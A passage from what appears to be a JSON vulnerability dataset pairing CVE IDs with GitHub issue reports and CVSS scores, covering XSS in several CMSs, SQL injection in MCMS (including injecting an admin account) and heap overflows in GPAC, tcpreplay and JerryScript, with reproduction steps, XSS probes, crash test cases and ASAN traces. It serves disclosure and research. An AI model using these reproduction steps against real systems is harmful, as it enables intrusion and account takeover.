  55336. "description": "Several XSS Vulnerabilities. Describe the bug Several XSS Vulnerabilities during XSS testing To Reproduce Case NUMBERTAG Go to APITAG NUMBERTAG APITAG a report NUMBERTAG Add a APITAG item with Fixed Text APITAG NUMBERTAG Click save, and then return to Item list NUMBERTAG See error, popup APITAG as below FILETAG NUMBERTAG Click APITAG tab NUMBERTAG See error again. Case NUMBERTAG Go to APITAG > Data Collection > Data Queries NUMBERTAG Select a data query, and click name to edit it NUMBERTAG Click name of one of Associated Graph Templates NUMBERTAG Modify name to APITAG NUMBERTAG Click Save button, then click Return button NUMBERTAG Click x icon of row right for the modified one NUMBERTAG See error, popup APITAG as below FILETAG Case3 FILETAG , delete,click a output/input field with APITAG alert('test CVE'); APITAG Case4 FILETAG add graph items with a color named APITAG alert('test CVE'); APITAG Case5 FILETAG add tree with APITAG alert('test CVE'); APITAG Case6 aggregate graph place on a tree named with APITAG alert('test CVE'); APITAG Desktop (please complete the following information) OS: Windows NUMBERTAG Browser: Firefox Version NUMBERTAG ESR",
  55337. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55338. "severity": "MEDIUM",
  55339. "baseScore": 6.1,
  55340. "impactScore": 2.7,
  55341. "exploitabilityScore": 2.8
  55342. },
  55343. {
  55344. "CVE_ID": "CVE-2020-23234",
  55345. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/320",
  55346. "Issue_Url_new": "https://github.com/lavalite/cms/issues/320",
  55347. "Repo_new": "lavalite/cms",
  55348. "Issue_Created_At": "2020-05-21T02:42:23Z",
  55349. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Blocks\" feature (the title says \"Links\"; the steps below refer to Blocks). The existing filter can be bypassed by using HTML event-handler attributes such as \"ontoggle\" (a tag-based blocklist misses attribute vectors; contextual output encoding is the reliable fix). To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the /admin NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Select a function then press New NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG View the preview to trigger XSS NUMBERTAG View the preview and observe the payload returned in the response, confirming Stored XSS FILETAG Impact commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
  55350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55351. "severity": "MEDIUM",
  55352. "baseScore": 4.8,
  55353. "impactScore": 2.7,
  55354. "exploitabilityScore": 1.7
  55355. },
  55356. {
  55357. "CVE_ID": "CVE-2020-23238",
  55358. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1473",
  55359. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1473",
  55360. "Repo_new": "evolution-cms/evolution",
  55361. "Issue_Created_At": "2020-06-01T07:24:09Z",
  55362. "description": "Cross Site Scripting Vulnerability on APITAG Manager\" feature in Evolution NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the APITAG Manager\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the /manager NUMBERTAG Go to APITAG Manager\" on Modules FILETAG NUMBERTAG Insert payload: '> APITAG FILETAG NUMBERTAG Click APITAG FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Versions Evolution CMS NUMBERTAG",
  55363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55364. "severity": "MEDIUM",
  55365. "baseScore": 5.4,
  55366. "impactScore": 2.7,
  55367. "exploitabilityScore": 2.3
  55368. },
  55369. {
  55370. "CVE_ID": "CVE-2020-23239",
  55371. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1495",
  55372. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1495",
  55373. "Repo_new": "textpattern/textpattern",
  55374. "Issue_Created_At": "2020-06-08T04:30:19Z",
  55375. "description": "Cross Site Scripting Vulnerability on APITAG Preferences\" feature in Textpattern NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Preferences\" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to APITAG Preferences\" FILETAG NUMBERTAG Click APITAG fields\" FILETAG NUMBERTAG Insert payload to Fields name: '> APITAG NUMBERTAG Click Icon Textpattern: FILETAG FILETAG Additional information Textpattern version NUMBERTAG",
  55376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55377. "severity": "MEDIUM",
  55378. "baseScore": 4.8,
  55379. "impactScore": 2.7,
  55380. "exploitabilityScore": 1.7
  55381. },
  55382. {
  55383. "CVE_ID": "CVE-2020-23242",
  55384. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/16",
  55385. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/16",
  55386. "Repo_new": "navigatecms/navigate-cms",
  55387. "Issue_Created_At": "2020-06-18T10:57:00Z",
  55388. "description": "Cross Site Script Vulnerability on APITAG feature in APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG NUMBERTAG Click Web users FILETAG NUMBERTAG Perform APITAG or APITAG FILETAG NUMBERTAG Add payload in name via Personal: '> APITAG NUMBERTAG Load web: FILETAG APITAG NUMBERTAG",
  55389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55390. "severity": "MEDIUM",
  55391. "baseScore": 4.8,
  55392. "impactScore": 2.7,
  55393. "exploitabilityScore": 1.7
  55394. },
  55395. {
  55396. "CVE_ID": "CVE-2020-23243",
  55397. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/18",
  55398. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/18",
  55399. "Repo_new": "navigatecms/navigate-cms",
  55400. "Issue_Created_At": "2020-06-19T04:12:30Z",
  55401. "description": "Cross Site Script Vulnerability APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the name=\"wrong_path_redirect\" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG > Web sites NUMBERTAG Click website edit NUMBERTAG Use Burp Suite inject payload to name=\"wrong_path_redirect\" : FILETAG Request: URLTAG FILETAG",
  55402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  55403. "severity": "MEDIUM",
  55404. "baseScore": 4.8,
  55405. "impactScore": 2.7,
  55406. "exploitabilityScore": 1.7
  55407. },
  55408. {
  55409. "CVE_ID": "CVE-2020-23262",
  55410. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/45",
  55411. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/45",
  55412. "Repo_new": "ming-soft/mcms",
  55413. "Issue_Created_At": "2020-05-12T14:03:18Z",
  55414. "description": "Security issue SQL injection in /mcms/view.do. The vulnerable query is in FILETAG . PATHTAG CODETAG First we need to enumerate the param \"id\" from NUMBERTAG to NUMBERTAG If the id is empty , we will get an error: FILETAG FILETAG If the id is available , we will get a normal page : FILETAG In this case , i choose NUMBERTAG as the id , it's very easy to enumerate the id: FILETAG Then we can easily confirm there is a SQL injection with the following url: APITAG If the condition is true NUMBERTAG it will delay NUMBERTAG seconds: FILETAG If the condition is false NUMBERTAG it will respond immediately: FILETAG So it's a typical SQL Injection. And there will be a Stacked SQL Injection if someone using FILETAG because APITAG set to true. PATHTAG ERRORTAG Malicious user can easily inject an admin account (username:admin password:msopen) into database with following url: APITAG In my case the url is: APITAG FILETAG Login successfully : FILETAG",
  55415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55416. "severity": "CRITICAL",
  55417. "baseScore": 9.8,
  55418. "impactScore": 5.9,
  55419. "exploitabilityScore": 3.9
  55420. },
  55421. {
  55422. "CVE_ID": "CVE-2020-23266",
  55423. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1481",
  55424. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1481",
  55425. "Repo_new": "gpac/gpac",
  55426. "Issue_Created_At": "2020-05-12T18:18:19Z",
  55427. "description": "Heap buffer overflow in APITAG odf_code.c. y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac. The issue is being triggered in the function APITAG at odf_code.c To Reproduce Steps to reproduce the behavior NUMBERTAG Compile according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55428. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55429. "severity": "MEDIUM",
  55430. "baseScore": 5.5,
  55431. "impactScore": 3.6,
  55432. "exploitabilityScore": 1.8
  55433. },
  55434. {
  55435. "CVE_ID": "CVE-2020-23267",
  55436. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1479",
  55437. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1479",
  55438. "Repo_new": "gpac/gpac",
  55439. "Issue_Created_At": "2020-05-12T16:22:14Z",
  55440. "description": "Heap buffer overflow in APITAG in APITAG y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac, during the pointer ptr points to the wrong memory area operation. The issue is being triggered in the function APITAG at isom_hinter_track_process.c. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration ERRORTAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Possible causes of vulnerabilities is in the function APITAG at isom_hinter_track_process.c. CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55441. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  55442. "severity": "HIGH",
  55443. "baseScore": 7.1,
  55444. "impactScore": 5.2,
  55445. "exploitabilityScore": 1.8
  55446. },
  55447. {
  55448. "CVE_ID": "CVE-2020-23269",
  55449. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1482",
  55450. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1482",
  55451. "Repo_new": "gpac/gpac",
  55452. "Issue_Created_At": "2020-05-13T01:17:29Z",
  55453. "description": "Heap buffer overflow APITAG in APITAG y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac, during structure APITAG 'stsz' member 'sizes' points to an invalid address. The issue is being triggered in the function APITAG at isomedia/stbl_read.c To Reproduce Steps to reproduce the behavior NUMBERTAG Compile according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Possible causes of vulnerabilities structure APITAG 'stsz' member 'sizes' points to an invalid address CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55454. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55455. "severity": "MEDIUM",
  55456. "baseScore": 5.5,
  55457. "impactScore": 3.6,
  55458. "exploitabilityScore": 1.8
  55459. },
  55460. {
  55461. "CVE_ID": "CVE-2020-23273",
  55462. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/579",
  55463. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/579",
  55464. "Repo_new": "appneta/tcpreplay",
  55465. "Issue_Created_At": "2020-05-19T15:57:25Z",
  55466. "description": "Bug] tcpreplay edit \u2014\u2014heap buffer overflow in randomize_iparp at APITAG Describe the bug A heap based buffer overflow was discovered in tcpreplay edit binary, during the pointer 'ip' dereference operation. The issue is being triggered in the function randomize_iparp at APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service APITAG potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Debug CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG Tcpreplay Version NUMBERTAG master branch",
  55467. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55468. "severity": "MEDIUM",
  55469. "baseScore": 5.5,
  55470. "impactScore": 3.6,
  55471. "exploitabilityScore": 1.8
  55472. },
  55473. {
  55474. "CVE_ID": "CVE-2020-23302",
  55475. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3748",
  55476. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3748",
  55477. "Repo_new": "jerryscript-project/jerryscript",
  55478. "Issue_Created_At": "2020-05-17T03:19:15Z",
  55479. "description": "heap use after free in the ecma_ref_ecma_string. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case var o = [] function add(i) { delete o[i NUMBERTAG new APITAG '\"\\\\u', ], APITAG } for (var i NUMBERTAG i APITAG NUMBERTAG ec NUMBERTAG b0: fa fa fa fa fa fa[fd]fd fa fa fd fa fa fa fd fa NUMBERTAG ec NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd NUMBERTAG ec NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  55480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55481. "severity": "CRITICAL",
  55482. "baseScore": 9.8,
  55483. "impactScore": 5.9,
  55484. "exploitabilityScore": 3.9
  55485. },
  55486. {
  55487. "CVE_ID": "CVE-2020-23303",
  55488. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3749",
  55489. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3749",
  55490. "Repo_new": "jerryscript-project/jerryscript",
  55491. "Issue_Created_At": "2020-05-17T04:04:34Z",
  55492. "description": "heap buffer overflow in the jmem_pools_collect_empty. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case try { [].length = { APITAG APITAG { return APITAG NUMBERTAG ubad\"', '\"\\\\u', new APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG } } assert (false); } catch (e) { APITAG (\"function APITAG { return NUMBERTAG this); } Output Script Error: ERRORTAG Invalid argument type. APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG at pc NUMBERTAG c bp NUMBERTAG fff4f NUMBERTAG sp NUMBERTAG fff4f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG thread T NUMBERTAG b in jmem_pools_collect_empty PATHTAG NUMBERTAG f NUMBERTAG in jmem_pools_finalize PATHTAG NUMBERTAG f in jmem_finalize PATHTAG NUMBERTAG d6a6 in jerry_cleanup PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG allocated by thread T0 here NUMBERTAG f7a NUMBERTAG dee in malloc ( PATHTAG NUMBERTAG b in jmem_heap_alloc PATHTAG NUMBERTAG eb in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b in jmem_pools_alloc PATHTAG NUMBERTAG c NUMBERTAG in ecma_alloc_number PATHTAG NUMBERTAG c in ecma_create_float_number PATHTAG NUMBERTAG fc4 in ecma_copy_value PATHTAG NUMBERTAG in ecma_fast_copy_value PATHTAG NUMBERTAG f NUMBERTAG in ecma_op_object_find_own PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in ecma_op_object_get PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c8d NUMBERTAG in APITAG PATHTAG NUMBERTAG c8ed9 in APITAG PATHTAG NUMBERTAG cd NUMBERTAG a in 
APITAG PATHTAG NUMBERTAG aa NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG abac in ecma_builtin_dispatch_call PATHTAG NUMBERTAG dce in ecma_op_function_call_simple PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG c NUMBERTAG f in APITAG PATHTAG NUMBERTAG cd4d5 in APITAG PATHTAG NUMBERTAG aa NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG abac in ecma_builtin_dispatch_call PATHTAG NUMBERTAG dce in ecma_op_function_call_simple PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG f8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG bc NUMBERTAG in ecma_op_object_default_value PATHTAG NUMBERTAG b5 in ecma_op_to_primitive PATHTAG NUMBERTAG c0 in ecma_op_to_string PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG jmem_pools_collect_empty Shadow bytes around the buggy address NUMBERTAG ebffff NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fa fa fa NUMBERTAG fa[fa]fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc 
Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55494. "severity": "CRITICAL",
  55495. "baseScore": 9.8,
  55496. "impactScore": 5.9,
  55497. "exploitabilityScore": 3.9
  55498. },
  55499. {
  55500. "CVE_ID": "CVE-2020-23306",
  55501. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3753",
  55502. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3753",
  55503. "Repo_new": "jerryscript-project/jerryscript",
  55504. "Issue_Created_At": "2020-05-18T05:18:42Z",
  55505. "description": "stack overflow in ecma_regexp_match. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case r = new APITAG APITAG ?)+?a\"); assert (r.exec(\"ba NUMBERTAG a\"); Output ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ff NUMBERTAG fcc (pc NUMBERTAG fc NUMBERTAG bp NUMBERTAG ff NUMBERTAG sp NUMBERTAG ff NUMBERTAG fb0 T NUMBERTAG fc NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG 